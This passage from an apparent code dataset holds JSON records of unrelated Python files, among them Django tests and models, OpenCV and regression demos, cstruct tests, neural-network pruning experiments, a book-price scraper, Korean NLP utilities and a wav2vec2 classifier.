category_ids = [instance.pk for instance in categories]\n\n        categories[0].subject_area = subject_areas[0]\n        categories[1].subject_area = 
subject_areas[1]\n\n categories[0].save()\n categories[1].save()\n\n users = mixer.cycle(2).blend(User)\n\n i = 0\n for user in users:\n user.profile.subject_area = subject_areas[i]\n user.save()\n user.profile.save()\n i += 1\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, full_score=full_score).__dict__\n data = {**data, \"categories\": category_ids}\n\n form = AccomplishmentFormMixin(data=data)\n instance = form.save()\n print(f\"....----....----.... {instance.users.all()}\")\n return instance\n\n def fetch_user_accomplishment(self, user_id, accomplishment_id):\n response = self.client.get(\n reverse_lazy(\"api_accomplishment:accomplishment-detail\",\n kwargs={\"user_id\": user_id, \"accomplishment_id\": accomplishment_id}))\n json_response = json.loads(response.content)\n return response, json_response\n\n def test_accomplishment_badges(self):\n self.assertEqual(self.session_user.profile.accomplishment_badges, 0)\n subject_area = mixer.blend(SubjectArea)\n categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n category_ids = [category.id for category in categories]\n\n subject_area.category_set.add(categories[0])\n subject_area.category_set.add(categories[1])\n\n profile = self.session_user.profile\n profile.subject_area = subject_area\n profile.save()\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, name=mixer.RANDOM, full_score=100).__dict__\n data = {**data, \"categories\": category_ids}\n\n response = self.client.post(reverse_lazy(\"accomplishment:list\"), data)\n self.assertEqual(response.status_code, 302)\n self.session_user.profile.refresh_from_db()\n self.assertEqual(self.session_user.profile.accomplishment_badges, 1)\n","repo_name":"memobijou/clinic-app","sub_path":"accomplishment/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20748457251","text":"import cv2\nimport numpy as np\n\n\nimg_dir = 'C:\\\\D\\\\testImgs\\\\'\nimg = cv2.imread(img_dir + 'aa.jpg')\nkernel = np.array([[0.299, 0.587, 0.114], [- 0.1687, 0.3313, 0.5], [0.5, 0.4187, 0.0813]])\n# 就是矩阵相乘:yuv = kernel * img, 针对每一个像素的rgb\nyuv = cv2.transform(img, kernel)\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ncv2.imshow('original', img)\ncv2.imshow('y', yuv[:, :, 0])\ncv2.imshow('gray', gray)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"kingtub/OpencvExercise","sub_path":"opencv-python-book/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73797074284","text":"import pytest\nfrom dissect import cstruct\n\nfrom dissect.cstruct.types import PackedType\n\nfrom .utils import verify_compiled\n\n\ndef test_packedtype_float():\n cs = cstruct.cstruct()\n\n assert cs.float16.dumps(420.69) == b\"\\x93^\"\n assert cs.float.dumps(31337.6969) == b\"e\\xd3\\xf4F\"\n assert cs.float16.reads(b\"\\x69\\x69\") == 2770.0\n assert cs.float.reads(b\"M0MS\") == 881278648320.0\n\n\ndef test_packedtype_float_struct(compiled):\n cdef = \"\"\"\n struct test {\n float16 a;\n float b;\n };\n \"\"\"\n cs = cstruct.cstruct()\n cs.load(cdef, compiled=compiled)\n\n assert verify_compiled(cs.test, compiled)\n\n buf = b\"69\\xb1U$G\"\n obj = cs.test(buf)\n\n assert obj.a == 0.6513671875\n assert obj.b == 42069.69140625\n\n\ndef test_packedtype_float_struct_be(compiled):\n cdef = \"\"\"\n struct test 
{\n float16 a;\n float b;\n };\n \"\"\"\n cs = cstruct.cstruct()\n cs.load(cdef, compiled=compiled)\n cs.endian = \">\"\n\n assert verify_compiled(cs.test, compiled)\n\n buf = b\"69G$U\\xb1\"\n obj = cs.test(buf)\n print(obj)\n\n assert obj.a == 0.388916015625\n assert obj.b == 42069.69140625\n\n\ndef test_packedtype_range():\n cs = cstruct.cstruct()\n float16 = PackedType(cs, \"float16\", 2, \"e\")\n float16.dumps(-65519.999999999996)\n float16.dumps(65519.999999999996)\n with pytest.raises(OverflowError):\n float16.dumps(-65519.999999999997)\n with pytest.raises(OverflowError):\n float16.dumps(65519.999999999997)\n","repo_name":"fox-it/dissect.cstruct","sub_path":"tests/test_packedtype.py","file_name":"test_packedtype.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"19"} +{"seq_id":"8451598305","text":"from collections import OrderedDict\nimport copy\nfrom intrafusion_test import wrapper_intra_fusion\nfrom fusion_utils_IF import MetaPruneType, PruneType\nfrom pruning_modified import prune_structured, prune_structured_intra\nfrom performance_tester import train_during_pruning, update_running_statistics\nfrom parameters import get_parameters\nfrom train import get_model\nimport torch\nfrom fusion import MSF, IntraFusion_Clustering, fusion, fusion_bn, fusion_old, fusion_sidak_multimodel, fusion_bn_alt, intrafusion_bn\nfrom sklearn.model_selection import train_test_split\nfrom torchvision.transforms import ToTensor\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nfrom torch import optim\nfrom torch.autograd import Variable\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nfrom models import get_pretrained_models\nimport json\nimport re\n\n\ndef get_cifar_data_loader(shuffle=True):\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root='./data', train=True, transform=transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32, 4),\n transforms.ToTensor(),\n normalize,\n ]), download=True),\n batch_size=128, shuffle=shuffle,\n num_workers=4, pin_memory=True)\n\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root='./data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=128, shuffle=False,\n num_workers=4, pin_memory=True)\n \n return {\n \"train\" : train_loader,\n \"test\" : val_loader\n }\n\n\ndef evaluate_performance_simple(input_model, loaders, gpu_id, eval=True):\n '''\n Computes the accuracy of a given model (input_model) on a given dataset (loaders[\"test\"]).\n '''\n if gpu_id != -1:\n input_model = input_model.cuda(gpu_id)\n \n if eval:\n input_model.eval()\n\n accuracy_accumulated = 0\n total = 0\n with torch.no_grad():\n for images, labels in loaders['test']:\n if gpu_id != -1:\n images, labels = images.cuda(), labels.cuda()\n \n test_output = input_model(images)\n\n pred_y = torch.max(test_output, 1)[1].data.squeeze()\n accuracy = (pred_y == labels).sum().item() / float(labels.size(0))\n accuracy_accumulated += accuracy \n total += 1\n input_model.cpu()\n return accuracy_accumulated / total\n\n\ndef get_data_loader(shuffle=True):\n test_data = datasets.MNIST(\n root = 'data', \n train = False, \n transform = ToTensor()\n ) \n\n train_data = datasets.MNIST(\n root = 'data', \n train = True, \n transform = ToTensor()\n ) \n\n # 2. 
defining the data loader for train and test set using the downloaded MNIST data\n loaders = { \n 'test' : torch.utils.data.DataLoader(test_data, \n batch_size=100, \n shuffle=shuffle, \n num_workers=1),\n \"train\": torch.utils.data.DataLoader(train_data, \n batch_size=100, \n shuffle=shuffle, \n num_workers=1)\n }\n return loaders\n\n\ndef test(model, loaders, args):\n model.eval()\n\n accuracy_accumulated = 0\n total = 0\n with torch.no_grad():\n for images, labels in loaders['test']:\n if args.gpu_id != -1:\n images, labels = images.cuda(), labels.cuda()\n test_output,_ = model(images)\n pred_y = torch.max(test_output, 1)[1].data.squeeze()\n accuracy = (pred_y == labels).sum().item() / float(labels.size(0))\n accuracy_accumulated += accuracy \n total += 1\n return accuracy_accumulated / total\n\n\nif __name__ == '__main__':\n args = get_parameters()\n num_models = args.num_models\n dict = {}\n it = 9\n\n models = get_pretrained_models(args.model_name, \"resnet50_diff_weight_init_True_cifar10\", args.gpu_id, num_models, output_dim=10)\n\n loaders = None\n if \"vgg\" not in args.model_name and \"resnet\" not in args.model_name:\n print(\"Went in here!!!\")\n loaders = get_data_loader()\n else:\n print(\"Got cifar\")\n loaders = get_cifar_data_loader()\n\n \n \"\"\"accuracies = []\n\n result = {}\n sparsities = [0.1, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9]\n result[\"prune\"] = {}\n result[\"IF\"] = {}\n prune_type = \"l1\"\n for sparsity in sparsities:\n print(\"----------\")\n t = prune_structured(net=copy.deepcopy(models[0]), loaders=None, prune_iter_epochs=0, gpu_id=args.gpu_id, example_inputs=torch.randn(1, 3, 32, 32),\n out_features=10, prune_type=prune_type, sparsity=sparsity, train_fct=None, prune_iter_steps=1)\n result[\"prune\"][sparsity] = evaluate_performance_simple(t, loaders, 0, eval=True)\n print(result[\"prune\"][sparsity])\n\n fused_model_g = wrapper_intra_fusion(model=models[0], model_name = args.model_name, resnet=False, sparsity=sparsity, prune_iter_steps=0, num_epochs=0, loaders=None, prune_type=\"l1\", meta_prune_type=MetaPruneType.IF, gpu_id=0)\n #fused_model_g = intrafusion_bn(models[0], full_model = models[0], meta_prune_type = MetaPruneType.IF, prune_type=prune_type, model_name=args.model_name, sparsity=sparsity, fusion_type=\"weight\", gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n result[\"IF\"][sparsity] = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print(result[\"IF\"][sparsity])\n print(\"--------------\")\n with open(f\"results_datafree_resnet18_{prune_type}.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n exit()\"\"\"\n\n\n for idx, ((layer0_name, fc_layer0_weight), (layer1_name, fc_layer1_weight)) in \\\n enumerate(zip(models[0].named_parameters(), models[0].named_parameters())):\n print(f\"{layer0_name} : {fc_layer0_weight.shape}\")\n\n\n fused_model_g = fusion_bn(models, model_name = args.model_name, fusion_type=\"activation\", gpu_id=-1, resnet=True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n #fused_model_g = wrapper_intra_fusion(model=models[0], model_name=args.model_name, resnet=True, sparsity=0.1, prune_iter_steps=0, num_epochs=0, loaders=loaders, prune_type=PruneType.L2, meta_prune_type=MetaPruneType.IF, gpu_id=0)\n #fused_model_g = fusion(models, gpu_id=args.gpu_id, resnet=True)\n print(evaluate_performance_simple(fused_model_g, loaders, 0, eval=True))\n exit()\n \"\"\"fused_model_g = 
intrafusion_bn(models[0], full_model = models[0], sparsity=0.9, fusion_type=\"weight\", gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n print(evaluate_performance_simple(fused_model_g, loaders, 0, eval=True))\n exit()\"\"\"\n\n\n result = {}\n\n train_epochs = 10\n sparsities = [0.9]\n total_steps = 5\n for idx, model in enumerate(models):\n result[f\"model_{idx}\"] = {}\n for sparsity in sparsities:\n print(\"****************Sparsity: \", sparsity)\n \"\"\"prune_steps = prune_structured_intra(net=copy.deepcopy(model), loaders=None, num_epochs=0, gpu_id=args.gpu_id, example_inputs=torch.randn(1, 3, 32, 32),\n out_features=10, prune_type=\"l1\", sparsity=sparsity, train_fct=None, total_steps=total_steps)\n fused_model_g = model\n for prune_step in prune_steps:\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=sparsity, fusion_type=\"weight\", full_model = model, small_model=prune_step, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n fused_model_g,_ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=train_epochs, gpu_id =0, prune=False, performed_epochs=0)\"\"\"\n fused_model_g = wrapper_intra_fusion(model=model, model_name=args.model_name, resnet=False, sparsity=sparsity, prune_iter_steps=total_steps, num_epochs=train_epochs, loaders=loaders, prune_type=PruneType.L2, meta_prune_type=MetaPruneType.IF, gpu_id=0)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print(\"fused: \", accuracy_fused_g)\n fused_model_g, epoch_accuracies = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=100, gpu_id =0, prune=False, performed_epochs=0)\n print(\"Final fused is: \", epoch_accuracies[-1])\n result[f\"model_{idx}\"][sparsity] = epoch_accuracies\n \n with open(\"results_intrafusion_resnet18_dataaware_prune_L2_05.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n\n\n exit()\n \"\"\"sparsities = [0.5, 0.6, 0.7, 0.8]\n result = {}\n for idx, model in enumerate(models):\n result[f\"model_{idx}\"] = {}\n for sparsity in sparsities:\n fused_model_g = model\n iterations = []\n if sparsity > 0.5:\n if sparsity == 0.6:\n iterations = [0.2, 0.4]\n if sparsity == 0.7 or sparsity == 0.8:\n iterations = [0.2, 0.4, 0.6]\n for i in iterations:\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=i, fusion_type=\"weight\", full_model = model, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=10, gpu_id =0, prune=False, performed_epochs=0)\n\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=sparsity, fusion_type=\"weight\", full_model = model, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n #fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=140, gpu_id =0, prune=False, performed_epochs=0)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print('Test Accuracy of the model fused beginning gradient: %.2f' % accuracy_fused_g)\n\n #print('Test Accuracy of the model fused beginning weight: %.2f' % accuracy_fused_w)\n\n fused_model_g, epoch_accuracies = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=150-10*len(iterations), gpu_id =0, prune=False, performed_epochs=0)\n\n print('Test Accuracy of the model fused beginning gradient: %.2f' % 
accuracy_fused_g)\n result[f\"model_{idx}\"][str(sparsity)] = epoch_accuracies\n\n with open(\"results_intrafusion.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n exit()\"\"\"\n #fused_model_w, _ = train_during_pruning(fused_model_w, loaders=loaders, num_epochs=40, gpu_id =0, prune=False, performed_epochs=0)\n fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=40, gpu_id =0, prune=False, performed_epochs=0)\n\n #accuracy_fused_w = evaluate_performance_simple(fused_model_w, loaders, 0, eval=True)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n\n #print('Test Accuracy of the model fused beginning weight: %.2f' % accuracy_fused_w)\n print('Test Accuracy of the model fused beginning gradient: %.2f' % accuracy_fused_g)\n \"\"\"fused_accs = []\n for idx in range(40):\n fused_model, _ = train_during_pruning(fused_model, loaders=loaders, num_epochs=1, gpu_id =0, prune=False, performed_epochs=0)\n fused_accs.append(evaluate_performance_simple(fused_model, loaders, 0, eval=True))\n\n\n accuracy_fused = evaluate_performance_simple(fused_model, loaders, 0, eval=True)\n print('Test Accuracy of the model fused after: %.2f' % accuracy_fused)\n print(fused_accs)\"\"\"\n\n\n\n\n \n\n\n\n\n\n\n \n\n\n","repo_name":"olinmg/DL_Project_LTH_Fusing","sub_path":"fusion_pruning_experiments/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44924297033","text":"'''\nSIMPLE WEBSCRAPPER TO SCRAPE THE PRICE OF ALL BOOKS ON SAID URL And writes them/saves to a cvs file to be viwed in a spreadsheet.\nSIMPLY CHANGE THE ELEMENTS AND VARIABLES TO REVERSE ENGINEER THIS TO WORK AS YOU SEE FIT.\n'''\nfrom flask import Flask, render_template, request, requests\nfrom bs4 import BeautifulSoup\nfrom csv import writer\n\n# Desired website:\nresponse = requests.get('http://books.toscrape.com/')\n\n# Declare Beautiful Soup Parser:\nsoup = BeautifulSoup(response.text, 'html.parser')\n\n#Declare Prices variavle:\nprices = soup.find_all(class_=\"product_price\") # find all classes with the name product_price\n\n# Save Data to CVS file:\nwith open('NameOfFile.csv', 'w') as csv_file:\n csv_writer = writer(csv_file)\n # headers = ['Title', 'Price']\n headers = [\"header1\", \"header2\"]\n csv_writer.writerow(headers)\n\n # loop through prices content and pinpick desired section/content, then save to CVS file\n for price in prices:\n myPrice = price.get_text().replace('\\n', '')[:7]\n csv_writer.writerow([myPrice]) # writes a row of each data into cvs file","repo_name":"EsC369/Python_Web_Scrapper","sub_path":"pythonWebScrapper.py","file_name":"pythonWebScrapper.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73837738923","text":"from teanaps import configure as con\n#from teanaps.nlp import NamedEntityRecognizer\n#from konlpy.tag import Kkma\nfrom kss import split_sentences\n \nimport re\nimport time\n#from pykospacing import spacing\n\nclass Processing(): \n def __init__(self):\n self.stopword_path = con.STOPWORD_PATH\n self.stopword_org_path = con.STOPWORD_ORG_PATH\n self.cnoun_path = con.CNOUN_PATH\n self.cnoun_org_path = con.CNOUN_ORG_PATH\n self.synonym_path = con.SYNONYM_PATH\n self.synonym_org_path = con.SYNONYM_ORG_PATH\n #self.kkma = Kkma()\n \n def get_synonym(self): \n synonym_list = 
open(con.SYNONYM_PATH, encoding=\"utf-8\").read().strip().split(\"\\n\")\n synonym_dict = {}\n for synonym in synonym_list:\n for i, word in enumerate(synonym.split(\"\\t\")):\n if i == 0:\n representative_word = word\n synonym_dict[representative_word] = synonym.split(\"\\t\")\n return synonym_dict\n \n def add_synonym(self, add_dict={}):\n synonym_dict = self.get_synonym()\n for representative_word, synonym_list in add_dict.items():\n if representative_word in synonym_dict.keys():\n for synonym in synonym_list:\n if synonym not in synonym_dict[representative_word]:\n synonym_dict[representative_word].append(synonym)\n else:\n synonym_dict[representative_word] = []\n for synonym in synonym_list:\n if synonym not in synonym_dict[representative_word]:\n synonym_dict[representative_word].append(synonym)\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n for representative_word, synonym_list in synonym_dict.items():\n synonym_line = \"\"\n if representative_word not in synonym_list:\n f.write(representative_word + \"\\t\")\n for synonym in synonym_list:\n synonym_line += synonym + \"\\t\"\n f.write(synonym_line.strip() + \"\\n\")\n f.close()\n \n def remove_synonym(self, remove_list=[]):\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n synonym_dict = self.get_synonym()\n for synonym in remove_list:\n if synonym in synonym_dict.keys():\n del synonym_dict[synonym]\n else:\n for representative_word, synonym_list in synonym_dict.items():\n if synonym in synonym_list:\n synonym_list.remove(synonym)\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n for representative_word, synonym_list in synonym_dict.items():\n synonym_line = \"\"\n if representative_word not in synonym_list:\n f.write(representative_word + \"\\t\")\n for synonym in synonym_list:\n synonym_line += synonym + \"\\t\"\n f.write(synonym_line.strip() + \"\\n\")\n f.close()\n \n def clear_synonym(self):\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_synonym(self):\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.synonym_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def is_synonym(self, synonym):\n synonym_dict = self.get_synonym()\n if synonym in synonym_dict.keys():\n return True\n for representative_word, synonym_list in synonym_dict.items():\n if representative_word == synonym or synonym in synonym_list:\n return True\n return False\n \n def get_cnoun(self):\n cnoun_list = []\n f = open(self.cnoun_path, encoding=\"utf-8\")\n for line in f:\n cnoun_list.append(line.strip())\n f.close()\n return cnoun_list\n \n def add_cnoun(self, add_list=[]):\n cnoun_list = self.get_cnoun()\n f = open(self.cnoun_path, \"a\", encoding=\"utf-8\")\n if type(add_list) == type(\"\"):\n add_list = [add_list]\n for cnoun in add_list:\n if cnoun not in cnoun_list:\n f.write(cnoun + \"\\n\")\n f.close()\n \n def remove_cnoun(self, remove_list=[]):\n cnoun_list = self.get_cnoun()\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n for cnoun in cnoun_list:\n if cnoun not in remove_list:\n f.write(cnoun + \"\\n\")\n f.close()\n \n def clear_cnoun(self):\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_cnoun(self):\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.cnoun_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def 
is_cnoun(self, cnoun):\n cnoun_list = self.get_cnoun()\n if cnoun in cnoun_list:\n return True\n else:\n return False\n \n def get_stopword(self):\n stopword_list = []\n f = open(self.stopword_path, encoding=\"utf-8\")\n for line in f:\n stopword_list.append(line.strip())\n f.close()\n return stopword_list\n \n def add_stopword(self, add_list=[]):\n stopword_list = self.get_stopword()\n f = open(self.stopword_path, \"a\", encoding=\"utf-8\")\n if type(add_list) == type(\"\"):\n add_list = [add_list]\n for stopword in add_list:\n if stopword not in stopword_list:\n f.write(stopword + \"\\n\")\n f.close()\n \n def remove_stopword(self, remove_list=[]):\n stopword_list = self.get_stopword()\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n for stopword in stopword_list:\n if stopword not in remove_list:\n f.write(stopword + \"\\n\")\n f.close()\n \n def clear_stopword(self):\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_stopword(self):\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.stopword_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def is_stopword(self, stopword):\n stopword_list = self.get_stopword()\n if stopword in stopword_list:\n return True\n else:\n return False\n \n def start_timer(self):\n self.start = time.time()\n self.lab = []\n \n def lab_timer(self):\n self.lab.append((len(self.lab)+1, round(time.time() - self.start, 4)))\n return self.lab\n \n '''\n def get_spacing(self, sentence):\n if len(sentence) < 195:\n sentence = spacing(sentence)\n return sentence\n '''\n \n def get_token_position(self, sentence_org, tag_list):\n content_ = sentence_org\n position = 0\n loc_list = []\n for word, pos in tag_list:\n loc = content_.find(word)\n if loc != -1:\n position += loc\n content_ = content_[loc:]\n start = position\n end = position + len(word)\n org_word = sentence_org[start:end]\n else:\n start = 0\n end = 0\n org_word = word\n loc_list.append((org_word, pos, (start, end)))\n return loc_list\n \n def language_detector(self, sentence):\n len_ko = len(re.sub(\"[^가-힇]\", \"\", sentence))\n len_en = len(re.sub(\"[^a-zA-Z]\", \"\", sentence))\n return \"ko\" if len_ko >= len_en else \"en\"\n\n def iteration_remover(self, sentence, replace_char=\".\"):\n pattern_list = [r'(.)\\1{5,}', r'(..)\\1{5,}', r'(...)\\1{5,}']\n for pattern in pattern_list:\n matcher= re.compile(pattern)\n iteration_term_list = [match.group() for match in matcher.finditer(sentence)]\n for iteration_term in iteration_term_list:\n sentence = sentence.replace(iteration_term, \n iteration_term[:pattern.count(\".\")] + replace_char*(len(iteration_term)-pattern.count(\".\")))\n return sentence\n \n def get_plain_text(self, sentence, pos_list=[], word_index=0, pos_index=1, tag_index=1, tag=True):\n plain_text_sentence = \"\"\n for token in sentence:\n if len(pos_list) > 0:\n if token[pos_index] in pos_list:\n plain_text_sentence += token[word_index].replace(\" \", \"\")\n if tag:\n plain_text_sentence += \"/\" + token[tag_index] + \" \"\n else:\n plain_text_sentence += \" \"\n else:\n plain_text_sentence += token[word_index].replace(\" \", \"\")\n if tag:\n plain_text_sentence += \"/\" + token[tag_index] + \" \"\n else:\n plain_text_sentence += \" \"\n return plain_text_sentence.strip()\n \n def replacer(self, sentence):\n patterns = [\n (r'won\\'t', 'will not'),\n (r'can\\'t', 'cannot'),\n (r'i\\'m', 'i am'),\n 
(r'ain\\'t', 'is not'),\n (r'(\\w+)\\'ll', '\\g<1> will'),\n (r'(\\w+)n\\'t', '\\g<1> not'),\n (r'(\\w+)\\'ve', '\\g<1> have'),\n (r'(\\w+)\\'s', '\\g<1> is'),\n (r'(\\w+)\\'re', '\\g<1> are'),\n (r'(\\w+)\\'d', '\\g<1> would'),\n ]\n self.patterns = [(re.compile(regex), repl) for (regex, repl) in patterns]\n for (pattern, repl) in self.patterns:\n sentence = re.sub(pattern, repl, sentence)\n return sentence\n \n '''\n def masking(self, sentence, replace_char=\"*\", replace_char_pattern = \"\", ner_tag_list=[], model_path=\"\"):\n if model_path == \"\":\n ner = NamedEntityRecognizer()\n else:\n ner = NamedEntityRecognizer(model_path=model_path)\n ner_result = ner.parse(sentence)\n for word, ner_tag, loc in ner_result:\n if len(ner_tag_list) == 0 or ner_tag in ner_tag_list:\n if replace_char_pattern != \"\":\n masked_word = \"\"\n for w, r in zip(word, replace_char_pattern):\n if w == r or r == \"_\":\n masked_word += w\n elif r == replace_char:\n masked_word += r\n else:\n masked_word += w\n if len(word) > len(replace_char_pattern):\n masked_word += replace_char*len(word[len(replace_char_pattern):])\n sentence = sentence[:loc[0]] + masked_word + sentence[loc[1]:]\n else:\n sentence = sentence[:loc[0]] + replace_char*len(word) + sentence[loc[1]:]\n \n return sentence\n '''\n\n def sentence_splitter(self, paragraph):\n #sentence_list = self.kkma.sentences(paragraph)\n sentence_list = split_sentences(paragraph)\n return sentence_list\n \n","repo_name":"fingeredman/teanaps","sub_path":"nlp/Processing.py","file_name":"Processing.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"19"} +{"seq_id":"33192152382","text":"class Point:\n\t'Represents a point in two-dimensional geometric coordinates'\n\tdef __init__(self, x=1, y=3):\n\t\t'''Initilies the position of...'''\n\t\tself.move(x, y)\n\tdef move(self, x, y):\n\t\t\"Move the point to a new location in 2D space.\"\n\t\tself.x = x\n\t\tself.y = y\n\tdef reset(self):\n\t\t\"\"\"Resets the points to 0,0\"\"\"\n\t\tself.move(0, 0)\np = Point(3,1)\nagain = True\nwhile(again):\n\tprint(p.x, p.y)\n\tp.move(p.x+1, p.y-3)\n\tif p.x > 100:\n\t\tagain = False\na = raw_input(\"Press Return Key To Exit...\")\n","repo_name":"brandann/GarbageCode","sub_path":"PYTHON/Examples/first_class.py","file_name":"first_class.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43146580849","text":"from transformers.models.wav2vec2.modeling_wav2vec2 import Wav2Vec2PreTrainedModel, Wav2Vec2Model\nimport torch\nimport torch.nn as nn\n\n# Wav2vec model skeleton\nclass Wav2vec2SER(Wav2Vec2PreTrainedModel):\n def __init__(self, config):\n super().__init__(config)\n self.config = config\n self.feat_extractor = Wav2Vec2Model(config)\n \n self.cls_layer = nn.Sequential(*[\n nn.Dropout(config.final_dropout),\n nn.Linear(config.hidden_size, config.hidden_size),\n nn.Tanh(),\n nn.Dropout(config.final_dropout),\n nn.Linear(config.hidden_size, config.num_labels)\n ]) \n self.init_weights()\n\n def forward(self, x):\n backbone_out = self.feat_extractor(x)\n logits = self.cls_layer(torch.mean(backbone_out[0], dim=1))\n return logits","repo_name":"adithya-tp/Low-Resource-SER-Experiments","sub_path":"models/wav2vec2.py","file_name":"wav2vec2.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 
+{"seq_id":"14430074886","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n# veri kumesini oku\nverikumesi = pd.read_csv(\"ds1.txt\",delimiter=\"\\t\")\n\nX = verikumesi.iloc[:,:-1].values\ny = verikumesi.iloc[:,1].values\n\n# veri kumesini egitim ve test olarak parcala\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n\n# dogrusal regresyon modeli\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n# tahmin\ny_pred = regressor.predict(X_test)\n\n# veri gorsellestirme\nplt.scatter(X_train, y_train, color='red')\nplt.plot(X_test, y_pred, color='blue')\nplt.show()","repo_name":"ocatak-zz/ocatak.github.io","sub_path":"SIB552/01/src/linear_reg.py","file_name":"linear_reg.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"70392388524","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\n\n\nUser = get_user_model()\nTEXT_LIMIT = 15 # Ограничение количтсве символов\n\n\nclass Group(models.Model):\n title = models.CharField('Имя группы', max_length=200)\n slug = models.SlugField(unique=True)\n description = models.TextField('Описание')\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = 'Группа'\n verbose_name_plural = 'Группы'\n\n\nclass Post(models.Model):\n text = models.TextField(\n 'Текст поста',\n help_text='Введите текст поста',\n )\n pub_date = models.DateTimeField(\n 'Дата публикации',\n auto_now_add=True,\n db_index=True,\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='posts',\n verbose_name='Автор',\n )\n group = models.ForeignKey(\n Group,\n on_delete=models.SET_NULL,\n related_name='posts',\n blank=True,\n null=True,\n verbose_name='Группа',\n help_text='Группа, к которой будет относиться пост',\n )\n image = models.ImageField(\n 'Картинка',\n upload_to='posts/',\n blank=True,\n help_text='Загрузите картинку',\n )\n\n def __str__(self):\n return self.text[:TEXT_LIMIT]\n\n class Meta:\n ordering = ['-pub_date']\n verbose_name = 'Сообщение'\n 